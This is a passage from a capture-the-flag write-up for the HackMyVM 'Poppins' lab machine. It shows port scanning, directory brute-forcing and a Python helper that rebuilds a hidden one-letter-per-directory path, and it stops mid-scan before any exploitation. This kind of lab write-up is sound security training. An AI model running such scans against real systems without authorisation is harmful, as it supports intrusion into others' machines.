HackMyVM-Poppins

Even if the world has changed since then,
even if I truly believed it had,
even if I hoped, even if I tried to change it,
the future is cruel.
And yet the world I was always watching with you
was truly beautiful.


Target IP: 192.168.56.252

Difficulty: medium

Topics covered: OpenSSH side-channel user enumeration (SSH User Enumeration), writing a Python script to automate the pentest, sudo privilege abuse (GTFOBins: mail), privilege escalation via the Ansible automation tool


Port scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.252
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.252:22
Open 192.168.56.252:80
Open 192.168.56.252:110
Open 192.168.56.252:995
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 02:07 -0500
Initiating ARP Ping Scan at 02:07
Scanning 192.168.56.252 [1 port]
Completed ARP Ping Scan at 02:07, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:07
Completed Parallel DNS resolution of 1 host. at 02:07, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:07
Scanning 192.168.56.252 [4 ports]
Discovered open port 80/tcp on 192.168.56.252
Discovered open port 22/tcp on 192.168.56.252
Discovered open port 110/tcp on 192.168.56.252
Discovered open port 995/tcp on 192.168.56.252
Completed SYN Stealth Scan at 02:07, 0.02s elapsed (4 total ports)
Nmap scan report for 192.168.56.252
Host is up, received arp-response (0.00088s latency).
Scanned at 2026-02-04 02:07:41 EST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
110/tcp open pop3 syn-ack ttl 64
995/tcp open pop3s syn-ack ttl 64
MAC Address: 08:00:27:78:88:97 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Service and version detection

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.252 -- -sV -sC -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.252:22
Open 192.168.56.252:80
Open 192.168.56.252:110
Open 192.168.56.252:995
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC -A" on ip 192.168.56.252
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 02:08 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Initiating ARP Ping Scan at 02:08
Scanning 192.168.56.252 [1 port]
Completed ARP Ping Scan at 02:08, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:08
Completed Parallel DNS resolution of 1 host. at 02:08, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:08
Scanning 192.168.56.252 [4 ports]
Discovered open port 22/tcp on 192.168.56.252
Discovered open port 80/tcp on 192.168.56.252
Discovered open port 995/tcp on 192.168.56.252
Discovered open port 110/tcp on 192.168.56.252
Completed SYN Stealth Scan at 02:08, 0.03s elapsed (4 total ports)
Initiating Service scan at 02:08
Scanning 4 services on 192.168.56.252
Completed Service scan at 02:08, 12.19s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.252
NSE: Script scanning 192.168.56.252.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 1.76s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Nmap scan report for 192.168.56.252
Host is up, received arp-response (0.0051s latency).
Scanned at 2026-02-04 02:08:30 EST for 17s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Issuer: commonName=Poppies
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-29T16:42:33
| Not valid after: 2035-08-27T16:42:33
| MD5: 77a4 3355 7780 8886 3706 4aa3 6317 3e10
| SHA-1: 7b74 675a 7bf9 4740 a85d 7414 5e36 e2a3 c7d8 22be
| SHA-256: f3a5 35e4 8b5f a50f b511 ca2d 9dfb 5c8c 816d eb7b 8d1f e838 adac 97a7 62fb 283a
|_pop3-capabilities: PIPELINING SASL(PLAIN) TOP USER UIDL AUTH-RESP-CODE RESP-CODES CAPA STLS
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 syn-ack ttl 64 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER UIDL TOP AUTH-RESP-CODE RESP-CODES CAPA
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Issuer: commonName=Poppies
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-29T16:42:33
| Not valid after: 2035-08-27T16:42:33
| MD5: 77a4 3355 7780 8886 3706 4aa3 6317 3e10
| SHA-1: 7b74 675a 7bf9 4740 a85d 7414 5e36 e2a3 c7d8 22be
| SHA-256: f3a5 35e4 8b5f a50f b511 ca2d 9dfb 5c8c 816d eb7b 8d1f e838 adac 97a7 62fb 283a
MAC Address: 08:00:27:78:88:97 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)

Uptime guess: 27.906 days (since Wed Jan 7 04:24:41 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 5.12 ms 192.168.56.252

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)

Besides 22 and 80, the host exposes the less common mail ports 110 (POP3) and 995 (POP3S). Connecting with nc works, but the service requires a login and no username is known at this point.

Directory brute-forcing

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u 192.168.56.252
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.252/_26-02-04_02-12-49.txt

Target: http://192.168.56.252/

[02:12:49] Starting:
[02:12:50] 403 - 279B - /.ht_wsr.txt
[02:12:50] 403 - 279B - /.htaccess.bak1
[02:12:50] 403 - 279B - /.htaccess.orig
[02:12:50] 403 - 279B - /.htaccess.sample
[02:12:50] 403 - 279B - /.htaccess.save
[02:12:50] 403 - 279B - /.htaccess_extra
[02:12:50] 403 - 279B - /.htaccessBAK
[02:12:50] 403 - 279B - /.htaccess_orig
[02:12:50] 403 - 279B - /.htaccess_sc
[02:12:50] 403 - 279B - /.htaccessOLD
[02:12:50] 403 - 279B - /.htaccessOLD2
[02:12:50] 403 - 279B - /.html
[02:12:50] 403 - 279B - /.htm
[02:12:50] 403 - 279B - /.htpasswd_test
[02:12:50] 403 - 279B - /.httr-oauth
[02:12:50] 403 - 279B - /.htpasswds
[02:12:50] 403 - 279B - /.php
[02:13:07] 301 - 312B - /s -> http://192.168.56.252/s/
[02:13:08] 403 - 279B - /server-status/
[02:13:08] 403 - 279B - /server-status

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,pem,001,php,zip,txt,html,htm --scan-dir-listings -C 503,404

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.252/s
🚩 In-Scope Url │ 192.168.56.252
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
💢 Status Code Filters │ [503, 404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [7z, pem, 001, php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 312c http://192.168.56.252/s => http://192.168.56.252/s/
301 GET 9l 28w 314c http://192.168.56.252/s/u => http://192.168.56.252/s/u/
301 GET 9l 28w 316c http://192.168.56.252/s/u/p => http://192.168.56.252/s/u/p/
301 GET 9l 28w 318c http://192.168.56.252/s/u/p/e => http://192.168.56.252/s/u/p/e/
301 GET 9l 28w 320c http://192.168.56.252/s/u/p/e/r => http://192.168.56.252/s/u/p/e/r/
[>-------------------] - 77s 148926/7939872 63m found:5 errors:4
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_56_252_s-1770189345.state ...
[>-------------------] - 77s 148959/7939872 63m found:5 errors:4
[>-------------------] - 77s 49194/1984914 642/s http://192.168.56.252/s/
[>-------------------] - 73s 39015/1984914 531/s http://192.168.56.252/s/u/
[>-------------------] - 69s 33102/1984914 482/s http://192.168.56.252/s/u/p/
[>-------------------] - 58s 26577/1984914 455/s http://192.168.56.252/s/u/p/e/

The directory layout here is odd: /s/u/p/e is one letter per level, which strongly suggests a word spelled out with / as the separator, so the path should continue letter by letter until the whole word is formed.

Building a wordlist

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# printf '%s\n' {a..z} >> a.txt

Recursive directory brute-forcing

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/ -w /home/kali/Desktop/a.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings -C 503,404 --depth=99999

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.252/s
🚩 In-Scope Url │ 192.168.56.252
🚀 Threads │ 50
📖 Wordlist │ /home/kali/Desktop/a.txt
💢 Status Code Filters │ [503, 404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [7z, bak, pem, 001, php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 99999
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 312c http://192.168.56.252/s => http://192.168.56.252/s/
301 GET 9l 28w 314c http://192.168.56.252/s/u => http://192.168.56.252/s/u/
301 GET 9l 28w 316c http://192.168.56.252/s/u/p => http://192.168.56.252/s/u/p/
301 GET 9l 28w 318c http://192.168.56.252/s/u/p/e => http://192.168.56.252/s/u/p/e/
301 GET 9l 28w 320c http://192.168.56.252/s/u/p/e/r => http://192.168.56.252/s/u/p/e/r/
301 GET 9l 28w 322c http://192.168.56.252/s/u/p/e/r/c => http://192.168.56.252/s/u/p/e/r/c/
301 GET 9l 28w 324c http://192.168.56.252/s/u/p/e/r/c/a => http://192.168.56.252/s/u/p/e/r/c/a/
301 GET 9l 28w 326c http://192.168.56.252/s/u/p/e/r/c/a/l => http://192.168.56.252/s/u/p/e/r/c/a/l/
301 GET 9l 28w 328c http://192.168.56.252/s/u/p/e/r/c/a/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/
301 GET 9l 28w 330c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/
301 GET 9l 28w 332c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/
301 GET 9l 28w 334c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/
301 GET 9l 28w 336c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/
301 GET 9l 28w 338c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
301 GET 9l 28w 340c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
301 GET 9l 28w 342c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
301 GET 9l 28w 344c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
301 GET 9l 28w 348c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
301 GET 9l 28w 350c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
301 GET 9l 28w 346c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
301 GET 9l 28w 354c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
301 GET 9l 28w 356c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
301 GET 9l 28w 352c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
301 GET 9l 28w 362c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
301 GET 9l 28w 364c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
301 GET 9l 28w 358c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
301 GET 9l 28w 366c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
301 GET 9l 28w 368c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
301 GET 9l 28w 370c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
301 GET 9l 28w 360c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
301 GET 9l 28w 372c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
301 GET 9l 28w 374c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
301 GET 9l 28w 376c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
301 GET 9l 28w 378c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
[####################] - 14s 29910/29910 0s found:34 errors:0
[####################] - 1s 530/530 898/s http://192.168.56.252/s/
[####################] - 1s 530/530 642/s http://192.168.56.252/s/u/
[####################] - 1s 530/530 697/s http://192.168.56.252/s/u/p/
[####################] - 1s 530/530 613/s http://192.168.56.252/s/u/p/e/
[####################] - 1s 530/530 643/s http://192.168.56.252/s/u/p/e/r/
[####################] - 1s 530/530 595/s http://192.168.56.252/s/u/p/e/r/c/
[####################] - 1s 530/530 588/s http://192.168.56.252/s/u/p/e/r/c/a/
[####################] - 1s 530/530 618/s http://192.168.56.252/s/u/p/e/r/c/a/l/
[####################] - 1s 530/530 616/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/
[####################] - 1s 530/530 557/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/
[####################] - 1s 530/530 565/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/
[####################] - 1s 530/530 546/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/
[####################] - 2s 530/530 308/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/
[####################] - 2s 530/530 230/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
[####################] - 2s 530/530 247/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
[####################] - 3s 530/530 205/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
[####################] - 2s 530/530 235/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
[####################] - 2s 530/530 269/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
[####################] - 2s 530/530 230/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
[####################] - 2s 530/530 223/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
[####################] - 3s 530/530 188/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
[####################] - 3s 530/530 198/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
[####################] - 3s 530/530 204/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
[####################] - 3s 530/530 152/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
[####################] - 4s 530/530 151/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
[####################] - 1s 530/530 457/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
[####################] - 1s 530/530 409/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
[####################] - 1s 530/530 489/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
[####################] - 1s 530/530 507/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
[####################] - 1s 530/530 482/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
[####################] - 1s 530/530 449/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
[####################] - 1s 530/530 442/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
[####################] - 1s 530/530 436/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
[####################] - 1s 530/530 569/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
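As an added example (not part of the original writeup, and not feroxbuster's own code), the following script rebuilds the word from feroxbuster's output instead of reading it off by eye, and reports any level that was never observed as a directory so that a skipped letter is noticed; the sample lines are a constructed excerpt in the same line format as the run above.

```python
#!/usr/bin/env python3
"""Rebuild the word hidden in a one-letter-per-directory path from feroxbuster output.

Besides joining the letters, the script checks that every prefix of the
deepest path was itself observed as a directory, so a level the scanner
missed (wordlist gap, rate limiting, a non-letter segment) is reported
instead of being silently skipped.
"""
from urllib.parse import urlparse

# Constructed excerpt in feroxbuster's line format (not the full run above);
# note that deeper paths can be reported before their parents.
SAMPLE_FEROX_OUTPUT = """\
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      312c http://192.168.56.252/s => http://192.168.56.252/s/
301      GET        9l       28w      314c http://192.168.56.252/s/u => http://192.168.56.252/s/u/
301      GET        9l       28w      318c http://192.168.56.252/s/u/p/e => http://192.168.56.252/s/u/p/e/
301      GET        9l       28w      316c http://192.168.56.252/s/u/p => http://192.168.56.252/s/u/p/
301      GET        9l       28w      320c http://192.168.56.252/s/u/p/e/r => http://192.168.56.252/s/u/p/e/r/
200      GET       60l      141w     1531c http://192.168.56.252/s/u/p/e/r/index.html
"""


def single_char_paths(output):
    """Return the set of observed paths (as segment tuples) made only of one-character segments."""
    paths = set()
    for line in output.splitlines():
        parts = line.split()
        # result lines look like: STATUS METHOD Nl Nw Nc URL [=> redirect target]
        if len(parts) < 6 or not parts[0].isdigit():
            continue
        segs = [s for s in urlparse(parts[5]).path.split("/") if s]
        if segs and all(len(s) == 1 for s in segs):
            paths.add(tuple(segs))
    return paths


def recover_word(output):
    """Return (word, missing_prefixes) for the deepest single-letter chain in the output."""
    paths = single_char_paths(output)
    if not paths:
        return "", []
    deepest = max(paths, key=len)
    # every prefix of the deepest path must have been seen as a directory itself
    missing = ["/".join(deepest[:n])
               for n in range(1, len(deepest) + 1)
               if deepest[:n] not in paths]
    return "".join(deepest), missing


if __name__ == "__main__":
    word, missing = recover_word(SAMPLE_FEROX_OUTPUT)
    print(f"word so far: {word}" + (f" (unobserved levels: {missing})" if missing else ""))
```

Feeding it the full run above (for example via `feroxbuster ... -o ferox.txt` and reading the file) yields the complete word and an empty list of missing levels.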
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings -C 503,404 --depth=99999

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
